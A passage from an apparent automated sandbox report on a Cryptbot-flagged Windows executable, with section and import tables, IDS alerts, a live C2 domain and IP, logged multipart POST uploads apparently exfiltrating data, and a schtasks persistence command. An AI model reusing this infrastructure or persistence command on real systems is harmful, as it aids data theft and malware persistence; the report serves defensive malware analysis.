IMAGE_DIRECTORY_ENTRY_IAT	0x5ec21c	0x1cc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4924c8	0x492600	cdb4999da9bf7089b73ea1d569736e7b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x494000	0x144e20	0x145000	7910b342e070bec7c7eb16b71a823a9c	False	0.041083984375	dBase III DBT, version number 0, next free block index 10, 1st item ";$G"	0.6085902503749854	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5d9000	0xe644	0xe800	97a6d41bbf0862bcfea68383a2c11349	False	0.2420191271551724	data	5.884144473426397	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x5e8000	0x210c	0x2200	072620f49523dc19fba6ff468a9f5c94	False	0.31985294117647056	data	4.792768326504078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x5eb000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5ec000	0xb78	0xc00	97cdf554a0ac12091b297189829e74d6	False	0.4052734375	data	5.118400113083461	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x5ed000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5ee000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5ef000	0x6aa80	0x6ac00	a5fa7fd95f9ecaff7958acc741340c76	False	0.14289602239461358	data	6.794973005742527	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetNativeSystemInfo, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetThreadLocale, HeapAlloc, HeapFree, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, _wcsnicmp, abort, atoi, bsearch, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, mbstowcs, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, qsort, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-18T19:17:11.739200+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49734	103.80.87.67	80	TCP
2024-10-18T19:17:13.898449+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49735	103.80.87.67	80	TCP
2024-10-18T19:17:18.316764+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49736	103.80.87.67	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 18, 2024 19:17:08.955997944 CEST	49734	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:08.961105108 CEST	80	49734	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:08.961224079 CEST	49734	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:08.961378098 CEST	49734	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:08.961411953 CEST	49734	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:08.966360092 CEST	80	49734	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:08.966605902 CEST	80	49734	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:11.736865997 CEST	80	49734	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:11.739200115 CEST	49734	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:11.745038033 CEST	80	49734	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:11.745111942 CEST	49734	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.092150927 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.839504004 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.839633942 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.839891911 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.839963913 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.845282078 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.845293999 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.845302105 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.845313072 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.845370054 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.845422983 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.845463037 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.845530033 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.845550060 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.845590115 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.845611095 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.845659971 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.845779896 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.845829010 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.845829010 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.845871925 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.849955082 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.850081921 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.850537062 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.850547075 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.850588083 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.850620985 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.850671053 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.850950956 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.851001978 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.851018906 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.851022959 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.851056099 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.851089954 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.898178101 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:13.898448944 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:13.946191072 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:14.853781939 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:15.412431002 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:15.412590027 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:15.418217897 CEST	80	49735	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:15.418282986 CEST	49735	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.669918060 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.676318884 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.676423073 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.676605940 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.676662922 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.683928013 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.683943033 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.683998108 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.684197903 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.684211016 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.684222937 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.684235096 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.684246063 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.684248924 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.684261084 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.684271097 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.684304953 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.684319019 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:16.684345961 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.689686060 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.690324068 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.690336943 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.690349102 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.690361023 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.690485001 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.690498114 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.690634966 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:16.736394882 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:18.316428900 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:18.316764116 CEST	49736	80	192.168.2.4	103.80.87.67
Oct 18, 2024 19:17:18.321805954 CEST	80	49736	103.80.87.67	192.168.2.4
Oct 18, 2024 19:17:18.321865082 CEST	49736	80	192.168.2.4	103.80.87.67

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 18, 2024 19:17:08.298470974 CEST	63319	53	192.168.2.4	1.1.1.1
Oct 18, 2024 19:17:08.949970007 CEST	53	63319	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 18, 2024 19:17:08.298470974 CEST	192.168.2.4	1.1.1.1	0xb45e	Standard query (0)	sevtbb17ht.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 18, 2024 19:17:08.949970007 CEST	1.1.1.1	192.168.2.4	0xb45e	No error (0)	sevtbb17ht.top		103.80.87.67	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sevtbb17ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	103.80.87.67	80	7416	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 19:17:08.961378098 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary33182410 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 410 Host: sevtbb17ht.top
Oct 18, 2024 19:17:08.961411953 CEST	410	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 33 31 38 32 34 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 61 63 Data Ascii: ------Boundary33182410Content-Disposition: form-data; name="file"; filename="Gacavi.bin"Content-Type: application/octet-stream8C*a8niUF?$FcLtXkDhog.UF%)jtw$/`MR[gk\{CrV`7$].Vd>q'
Oct 18, 2024 19:17:11.736865997 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 18 Oct 2024 17:17:11 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	103.80.87.67	80	7416	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 19:17:13.839891911 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary66532437 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 75801 Host: sevtbb17ht.top
Oct 18, 2024 19:17:13.839963913 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 36 35 33 32 34 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 75 64 Data Ascii: ------Boundary66532437Content-Disposition: form-data; name="file"; filename="Pudipoxog.bin"Content-Type: application/octet-streamPueJ7wp%4Y);[:r1K?D`ZwjO5BN`-gm
Oct 18, 2024 19:17:13.845370054 CEST	6180	OUT	Data Raw: 11 a5 90 a0 d4 6f 24 1f 0f 5e 98 ae 33 b8 53 a6 e6 25 70 7b f6 34 b4 37 d1 69 7d c1 91 1f a1 8c 6a 35 35 76 7b 28 98 36 0b a6 66 c9 97 99 79 bf e9 a1 46 dd 6b ef 89 c2 f8 34 59 09 b6 80 5a de 1b f7 a5 a7 09 36 3c 6c 15 e2 ae 66 4c 1a 56 f7 ff f6 Data Ascii: o$^3S%p{47i}j55v{(6fyFk4YZ6<lfLVL<2s7iUXU_QAZH9U.B;^Hvu-O:4QG<:Vx#+{Gicu$)oJcRw%\|tS8>nz
Oct 18, 2024 19:17:13.845422983 CEST	2472	OUT	Data Raw: ee 43 9b 56 61 a3 b0 61 92 4c 29 59 c5 38 f7 67 ba 7e 64 48 91 86 0c 0b fa c2 66 2c f0 21 db 88 de f5 fe e2 53 7b d1 d5 ff 97 2a 23 f6 92 e4 b1 78 0a 51 eb 65 4a bf 63 11 08 49 34 38 3e b7 e8 39 88 4a 20 77 6b bd de 27 a1 5d 0e 3b d9 67 f2 dc 65 Data Ascii: CVaaL)Y8g~dHf,!S{#xQeJcI48>9J wk'];ge$^^UNn0BbiSF/\g(MAxT!OZ1I!QkyM@$04aWQZz\3zVTMyEgr40fq.6D@72k=\B7\7
Oct 18, 2024 19:17:13.845550060 CEST	2472	OUT	Data Raw: fd a3 ca 0b 19 47 07 72 ba ce 55 4e e2 b3 e2 9c b2 f4 22 21 2e 7a 92 13 7d 0a 27 71 98 76 14 7f 80 a0 22 6f 63 8a de 2c 84 00 43 8f ec 3f a9 dc b1 d3 78 63 fe 57 61 3d 5a 8e ad 3c 64 7d c7 19 58 50 5d 31 62 24 24 cb 1c 2f 8c 23 80 f7 a3 86 df d0 Data Ascii: GrUN"!.z}'qv"oc,C?xcWa=Z<d}XP]1b$$/#v1(bl.L[\|(~tQ9lKlBS-ni kdPRcP.1rq^lBjbe3_9l.4q_zwg&q
Oct 18, 2024 19:17:13.845611095 CEST	2472	OUT	Data Raw: 35 e3 57 3d eb 4d 06 04 c2 7c 41 d2 36 ff e1 98 52 48 52 43 5f 37 9b c7 0c 31 b2 1f 16 18 a0 14 29 b2 24 99 a5 5c 8e 03 5d 37 79 00 44 0f 45 c1 18 30 d6 b8 4d 4b ff fc b9 71 a0 33 db a4 e6 13 36 d6 52 e8 eb 3a a0 90 b0 78 c7 e7 08 ea 50 d9 a0 40 Data Ascii: 5W=M\|A6RHRC_71)$\]7yDE0MKq36R:xP@{XCjRId-Rtf6kxITb--:yf2fnI{~#\|+w0s4\|V1P~h_-<"EC#+oP"$VB{b6+ts$L(qJcL'L;
Oct 18, 2024 19:17:13.845659971 CEST	2472	OUT	Data Raw: bf 7a 8d 31 37 d5 9d 3e dc a4 9f ff 3a 39 56 f3 48 d9 31 ba f5 df 95 a3 d9 8b 63 af 19 bc f3 4c 7a f6 79 45 c6 af 6f fa 50 db fe d5 ae 4a 90 fd 7e fe 23 38 84 69 3c 83 52 1d d7 71 52 11 99 94 18 cb 84 5f 9e 86 ef 6d 3a fe 23 27 1f be 3a 55 bc b0 Data Ascii: z17>:9VH1cLzyEoPJ~#8i<RqR_m:#':U}\|3(3\|PtqHX8J.vo!`e<pOU'.qS7;UsY1>FCYTg7Rk/P%'wE,/G{$fq<}H
Oct 18, 2024 19:17:13.845829010 CEST	2472	OUT	Data Raw: 03 b1 ce 48 67 4c de f8 07 e6 82 fb 3c b7 e9 df fd 94 be 36 89 1c 5e 49 5f a3 3c 05 ec 54 c2 e9 5b 34 85 97 b1 f5 fc f1 05 17 29 e1 da d2 1e f5 13 b8 89 ec 81 40 f1 5b 2b b9 b2 10 e9 a0 33 a1 33 e8 31 cc f9 2b 00 a7 5d 28 25 8a cb 25 e8 ce 3c 8f Data Ascii: HgL<6^I_<T[4)@[+331+](%%<.npxw)/BOB0a1<E7&UY6g;cUFlI&Hs)n#Iu}4in@.rq_?dZ
Oct 18, 2024 19:17:13.845871925 CEST	2472	OUT	Data Raw: 79 11 9d d9 a2 5b da 07 f9 cb a3 e6 64 74 b1 01 a0 62 79 83 17 1c 8d 89 89 29 0b 38 c8 03 bb 66 23 33 df 5f 95 71 6a 65 15 2e e2 1e a1 d0 4b fb 3f ad 25 2c e9 7e b1 26 f0 72 74 74 b9 04 ed 69 2a 9b 39 a0 4c 68 4f 66 4a bf 62 c6 77 b4 b0 e8 8f 74 Data Ascii: y[dtby)8f#3_qje.K?%,~&rtti9LhOfJbwt(6Ye}N[p9.A".ofnP]H2j-:{;(3Rh?dZ^-)v't&m"3DG-)Ee204y%<n9
Oct 18, 2024 19:17:13.850081921 CEST	2472	OUT	Data Raw: 72 57 3c 32 fa 2b d1 1e ba 2e 74 26 6a 0f 84 5b 02 7e 06 d7 3d 2b 44 e2 be d0 06 aa 62 50 bf 68 9e dc b6 49 94 77 5c 1e 06 d7 44 62 55 18 04 bb f0 f8 79 36 c1 ca fa 9a 87 13 a8 02 3c 47 c3 16 c4 e1 70 ae 7b a6 c1 e2 52 bb 26 cd 7d da a2 0f fb ec Data Ascii: rW<2+.t&j[~=+DbPhIw\DbUy6<Gp{R&}Tz%\jyr0`WQ1v.dHI$#j!Iu0Y7X(4r~(IPc.{:^J#d9do/zr
Oct 18, 2024 19:17:13.850620985 CEST	4944	OUT	Data Raw: 38 b2 9d 78 c0 da d9 34 8f 31 53 0c e8 60 5f 79 40 01 69 83 51 14 f4 dc 06 d7 4d 14 d2 95 b5 ac b2 15 96 2c ec f4 8b 86 74 a5 84 07 12 1b 8d b6 ef bd de 94 30 f9 c5 8f 64 33 1b b3 94 d7 87 e8 a7 b6 b1 f0 be af c8 36 71 7f 8b 1c f9 6e f8 6b 73 d9 Data Ascii: 8x41S`_y@iQM,t0d36qnks@lwL&DqDn5%@Dc%o]6)(r1QIb)DD7T+?un218}Oix![J_x0U9eBD\+&
Oct 18, 2024 19:17:15.412431002 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 18 Oct 2024 17:17:15 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	103.80.87.67	80	7416	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 18, 2024 19:17:16.676605940 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary80856451 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29712 Host: sevtbb17ht.top
Oct 18, 2024 19:17:16.676662922 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 30 38 35 36 34 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 61 6c Data Ascii: ------Boundary80856451Content-Disposition: form-data; name="file"; filename="Qalaqefu.bin"Content-Type: application/octet-stream1x-huyfe"JnwJv}l;mjGWU4i79%@,Ery]O/GH_=7
Oct 18, 2024 19:17:16.683998108 CEST	3708	OUT	Data Raw: 25 6c 68 2f e5 6f 17 ff fc 54 b8 f6 00 ee 06 3f 3c 55 d2 0c 1b 54 a9 d2 89 f6 a7 06 ee f1 23 ac 70 a0 05 11 36 d3 76 05 08 54 3c 4a 91 da 50 4c 46 ab 7d 56 84 85 3f 52 f1 b6 94 33 13 93 c6 44 98 52 ed 42 65 dd 0d fa 5a 2b a5 46 bb ea 88 18 1e 8f Data Ascii: %lh/oT?<UT#p6vT<JPLF}V?R3DRBeZ+F~gR_pMr@)]L+qqM>+5LD9R`qO,$Y(HxX?'"OAK*-UGbo~Aa?>gC&d
Oct 18, 2024 19:17:16.684248924 CEST	2472	OUT	Data Raw: 99 50 8f 2b 10 56 1a 93 4c 3f 7e 52 47 0c ef 4f 7a e1 56 a7 0f 9c 88 50 37 e9 af aa 39 3d 27 50 19 9b d4 01 27 9a 45 c2 a5 89 55 3e ab 7f 01 18 41 01 9d af 5e c3 04 14 46 b6 e2 e4 98 52 3d 68 3f b5 6b c2 7a 39 77 27 de 4b c7 3b 10 2c 1c 03 16 4c Data Ascii: P+VL?~RGOzVP79='P'EU>A^FR=h?kz9w'K;,LJ<WzKw*6%Eg6N/~NV-~ZkvBAP/!#Av3:(P}XX!=jd<s7}3&$',p.bxlU(+PU2n
Oct 18, 2024 19:17:16.684271097 CEST	4944	OUT	Data Raw: 83 86 fb 9c 04 1c 22 74 c7 fd 66 18 33 ed 7f 5a 39 7d 1b 33 98 fe 3b f4 e6 c1 70 65 13 e8 af fc 73 b3 d5 c6 54 26 a6 21 27 36 41 0f fe 3b a2 65 0b 36 9d 86 89 08 c4 04 18 29 63 de d2 28 ca 39 44 2a 1b 71 93 fa c3 b1 6b 73 bb 09 f5 3c da c0 74 66 Data Ascii: "tf3Z9}3;pesT&!'6A;e6)c(9Dqks<tfG$Y9M0P-=:P QOe:t~cK:[2>Z5_w1-+MUOx&hY@Ke,:RwY?"+PyL{mnq\|3#i}}%~uB
Oct 18, 2024 19:17:16.684304953 CEST	4944	OUT	Data Raw: d1 dd c5 39 64 45 28 d5 c2 3a 21 7d 72 1a d0 b1 f5 40 2e 69 3d 0e c5 e7 00 5b 72 67 24 52 77 b1 77 47 ea 90 43 64 e1 7e 9c bb 7f b2 42 cf c9 4f f6 ec 45 2f 03 cf 83 c2 b5 d4 9c d0 3f c2 23 f4 a0 c8 50 fd c9 12 2e c4 21 56 dc 70 10 4e 21 a4 08 d0 Data Ascii: 9dE(:!}r@.i=[rg$RwwGCd~BOE/?#P.!VpN!e8P2J4fPcUTrj`xR+c"I9>:vU]eF[`qUS@8Jc;o:5qZ[G(UQxmf
Oct 18, 2024 19:17:16.684319019 CEST	2520	OUT	Data Raw: da ed 15 75 62 58 21 67 3b 98 67 7c 49 71 a7 09 ce 1b 23 74 38 06 c6 e3 aa 06 bc 5b a4 19 dc b5 05 63 d1 8e c0 91 1d 41 04 d3 09 f8 d0 51 55 88 64 66 7b 68 79 e3 72 9e 2f 44 67 22 f0 f5 89 5f 7a b9 5d 9e dd 3e 69 f9 79 9e b1 35 52 8c 04 7c 3e 4d Data Ascii: ubX!g;g\|Iq#t8[cAQUdf{hyr/Dg"_z]>iy5R\|>MD)UzQR=WV[QJ(zl((`khf\jbl`IV~EVOX*].y^~{fv,\G\SGr:2,mk(&`qGlZ6
Oct 18, 2024 19:17:18.316428900 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 18 Oct 2024 17:17:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	13:17:01
Start date:	18/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xdf0000
File size:	6'635'520 bytes
MD5 hash:	BFE2F72AAF59AD12FE5479D4936D9D52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2283603151.00000000046EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:18:02
Start date:	18/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0xac0000
File size:	314'617'856 bytes
MD5 hash:	A91E6E8067DCF42DF58AFD7304BC3D32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:18:02
Start date:	18/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0x960000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:18:02
Start date:	18/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:18:05
Start date:	18/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
